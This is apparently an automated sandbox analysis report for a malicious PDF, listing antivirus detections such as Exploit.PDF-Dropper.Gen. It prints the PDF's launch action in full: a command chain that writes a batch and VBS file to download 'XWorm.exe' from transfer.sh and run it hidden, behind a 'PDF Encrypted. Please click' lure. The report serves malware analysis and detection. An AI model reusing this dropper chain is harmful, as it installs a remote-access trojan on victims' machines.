Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | March 29, 2023, 1:37 p.m. | March 29, 2023, 1:37 p.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
Open action | << /S /Launch /Win << /F CMD /P /c cD %tEMP% &@echo powershell -Command "(New-Object Net.WebClient).DownloadFile('https://transfer.sh/get/1MeR2u/XWorm.exe', 'payload.exe')" >> msd89h2j389uh.bat &@echo timeout /t 5 >> msd89h2j389uh.bat &@echo start payload.exe >> msd89h2j389uh.bat &@echo Set oShell = CreateObject ("Wscript.Shell") >> encrypted.vbs &@echo Dim strArgs >> encrypted.vbs &@echo strArgs = "cmd /c msd89h2j389uh.bat" >> encrypted.vbs &@echo oShell.Run strArgs, 0, false >> encrypted.vbs & encrypted.vbs &dEl encrypted.vbs PDF Encrypted. Please click >> >> |
MicroWorld-eScan | Heur.BZC.HEV.Pantera.53.CE4B189C |
FireEye | Heur.BZC.HEV.Pantera.53.CE4B189C |
Sangfor | Exploit.Generic-Script.Save.0a46cc5b |
Arcabit | Exploit.PDF-Dropper.Gen |
BitDefender | Heur.BZC.HEV.Pantera.53.CE4B189C |
VIPRE | Heur.BZC.HEV.Pantera.53.CE4B189C |
TrendMicro | HEUR_PDFEXP.D |
McAfee-GW-Edition | BehavesLike.PDF.Trojan.tx |
Emsisoft | Exploit.PDF-Dropper.Gen (B) |
GData | Exploit.PDF-Dropper.Gen |
ALYac | Exploit.PDF-Dropper.Gen |
MAX | malware (ai score=85) |
Fortinet | VBS/Pantera.6A942003!tr |